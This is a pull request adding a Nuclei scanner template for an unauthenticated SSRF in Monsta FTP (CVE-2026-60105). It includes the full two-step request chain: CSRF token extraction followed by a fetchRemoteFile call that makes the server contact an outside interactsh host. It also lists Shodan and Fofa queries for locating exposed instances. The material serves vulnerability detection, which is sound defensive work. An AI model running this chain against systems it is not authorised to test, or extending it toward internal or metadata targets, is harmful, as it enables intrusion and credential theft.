### PR TITLE
CVE-2026-60105 - Monsta FTP <= 2.14.4 - Unauthenticated SSRF via IPv6 Blocklist Bypass

### DIFF
--- a/http/cves/2026/CVE-2026-60105.yaml
+++ b/http/cves/2026/CVE-2026-60105.yaml
@@ -1,0 +1,73 @@
+id: CVE-2026-60105
+
+info:
+  name: Monsta FTP <= 2.14.4 - Unauthenticated SSRF via IPv6 Blocklist Bypass
+  author: chocapikk,DhiyaneshDk
+  severity: high
+  description: |
+    Monsta FTP before 2.14.5 contains a server-side request forgery vulnerability in the fetchRemoteFile action caused by an incomplete IP blocklist check in the isBlockedIP() function, which fails to detect embedded IPv4 addresses within IPv4-mapped IPv6 addresses.
+  impact: |
+    An unauthenticated attacker can obtain a CSRF token from the public getSystemVars endpoint and submit a fetchRemoteFile request with a source URL resolving to an IPv4-mapped address, causing the server to issue HTTP requests to internal services and write responses to an attacker-controlled FTP destination, enabling retrieval of cloud instance metadata credentials.
+  remediation: Upgrade to Monsta FTP 2.14.5 or later.
+  reference:
+    - https://www.vulncheck.com/blog/monsta-ftp-ssrf-ipv6-blocklist-bypass
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2026-60105
+    cwe-id: CWE-918,CWE-184
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: monsta
+    product: monsta-ftp
+    shodan-query: http.html:"Monsta FTP"
+    fofa-query: body="Monsta FTP"
+  tags: cve,cve2026,monsta,ftp,ssrf,oob,unauth
+
+flow: http("get-csrf") && http("ssrf-probe")
+
+http:
+  - id: get-csrf
+    raw:
+      - |
+        POST /mftp/application/api/api.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        request={"actionName":"getSystemVars","context":{}}
+
+    host-redirects: true
+    max-redirects: 2
+
+    matchers:
+      - type: word
+        words:
+          - "csrfToken"
+        internal: true
+
+    extractors:
+      - type: regex
+        name: csrf_token
+        regex:
+          - '"csrfToken"\s*:\s*"([a-f0-9]+)"'
+        group: 1
+        internal: true
+
+  - id: ssrf-probe
+    raw:
+      - |
+        POST /mftp/application/api/api.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-CSRF-Token: {{csrf_token}}
+
+        request={"actionName":"fetchRemoteFile","connectionType":"ftp","configuration":{"host":"{{interactsh-url}}","port":21,"username":"anonymous","password":"anonymous@","passive":true},"context":{"source":"http://{{interactsh-url}}/ssrf-probe","destination":"/"}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"
+        condition: or


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
